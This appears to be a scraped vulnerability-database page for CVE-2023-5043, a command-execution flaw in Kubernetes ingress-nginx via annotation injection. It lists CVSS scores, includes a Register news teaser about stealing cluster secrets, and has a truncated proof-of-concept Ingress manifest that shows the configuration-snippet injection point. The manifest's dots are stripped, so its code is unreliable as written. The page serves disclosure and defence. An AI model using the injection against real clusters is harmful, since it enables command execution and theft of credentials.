Published: 25/10/2023 Updated: 07/03/2024

CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8

VMScore: 0

Ingress nginx annotation injection causes arbitrary command execution.

Vulnerable Product	Search on Vulmon	Subscribe to Product
kubernetes ingress-nginx

PoC CVE-2023-5043

CVE-2023-5043 Ingress nginx annotation injection causes arbitrary command execution Create Ingress (can be created without Service and Pod) apiVersion: networkingk8sio/v1 kind: Ingress metadata: name: ingress-exploit annotations: kubernetesio/ingressclass: "nginx" nginxingresskubernetesio/configuration-snippet: | more_set_headers "robin

Unpatched NGINX ingress controller bugs can be abused to steal Kubernetes cluster secrets

The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Just tricks, no treats with these 3 vulns

Three unpatched high-severity bugs in the NGINX ingress controller can be abused by miscreants to steal credentials and other secrets from Kubernetes clusters. The vulnerabilities, tracked as CVE-2023-5043, CVE-2023-5044 and CVE-2022-4886, were disclosed on October 27, and are listed as currently awaiting triage. It's unclear if any of the flaws have been exploited. The Register did not immediately receive a response to questions, including if the bugs have been found and exploited and whe...

CVE-2023-5043

Vulnerability Summary

Vulnerability Trend

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect